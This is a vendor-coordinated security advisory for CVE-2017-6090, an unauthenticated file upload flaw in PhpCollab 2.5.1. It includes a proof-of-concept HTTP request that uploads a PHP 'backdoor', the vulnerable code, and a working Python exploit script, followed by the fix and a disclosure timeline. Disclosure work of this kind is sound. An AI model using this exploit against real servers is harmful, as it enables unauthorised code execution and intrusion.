1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123 | # [CVE-2017-6090] PhpCollab 2.5.1 Arbitrary File Upload (unauthenticated)
## Description
PhpCollab is an open source web-based project management system, that enables collaboration across the Internet.
## Arbitrary File Upload
The phpCollab code does not correctly filter uploaded file contents. An unauthenticated attacker may upload and execute arbitrary code.
**CVE ID**: CVE-2017-6090
**Access Vector**: remote
**Security Risk**: Critical
**Vulnerability**: CWE-434
**CVSS Base Score**: 10 (Critical)
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
### Proof of Concept
The following HTTP request allows an attacker to upload a malicious php file, without authentication.
Thus, a file named after `$id.extension` is created.
For example, a backdoor file can be reached at `http://phpCollab.lan/logos_clients/1.php`.
```
POST /clients/editclient.php?id=1&action=update HTTP/1.1
Host: phpCollab.lan
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137
Content-Length: 252
-----------------------------154934846911423734231554128137
Content-Disposition: form-data; name="upload"; filename="backdoor.php"
Content-Type: application/x-php
<?php phpinfo(); ?>
-----------------------------154934846911423734231554128137--
```
### Vulnerable code
The vulnerable code is found in `clients/editclient.php`, line 63.
```
$extension = strtolower( substr( strrchr($_FILES['upload']['name'], ".") ,1) );
if(@move_uploaded_file($_FILES['upload']['tmp_name'], "../logos_clients/".$id.".$extension"))
{
chmod("../logos_clients/".$id.".$extension",0666);
$tmpquery = "UPDATE ".$tableCollab["organizations"]." SET extension_logo='$extension' WHERE id='$id'";
connectSql("$tmpquery");
}
```
### Exploit code
```
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import sys
import requests
if __name__ == '__main__':
if (len(sys.argv) != 4):
print("Enter your target, userid and path for file upload like : python exploit.py http://www.phpCollabURL.lan 1 /tmp/test.php")
sys.exit(1)
target = "%s/clients/editclient.php?id=%s&action=update" % (sys.argv[1], sys.argv[2])
print("[*] Trying to exploit with URL : %s..." % target)
backdoor = {'upload': open(sys.argv[3], 'rb')}
r = requests.post(target, files=backdoor)
extension = os.path.splitext(sys.argv[3])[1]
link = "%s/logos_clients/%s%s" % (sys.argv[1], sys.argv[2], extension )
r = requests.get(link)
if r.status_code == 200:
print("[OK] Backdoor link : %s" % link)
else:
print("[FAIL]Problem (status:%s) (link:%s)" % (r.status_code, link))
```
## Solution
Update to the latest version avalaible.
## Affected versions
* Version <= 2.5.1
## Timeline (dd/mm/yyyy)
* 27/08/2016 : Initial discovery.
* 05/10/2016 : Initial contact.
* 11/10/2016 : GPG Key exchange.
* 19/10/2016 : Advisory sent to vendor.
* 13/02/2017 : First fixes.
* 15/02/2017 : Fixes validation by Sysdream.
* 21/02/2017 : PhpCollab ask to wait before publish.
* 21/06/2017 : New version has been released.
* 29/09/2017 : Public disclosure.
## Credits
* Nicolas SERRA, Sysdream (n.serra -at- sysdream -dot- com)
--
SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
|
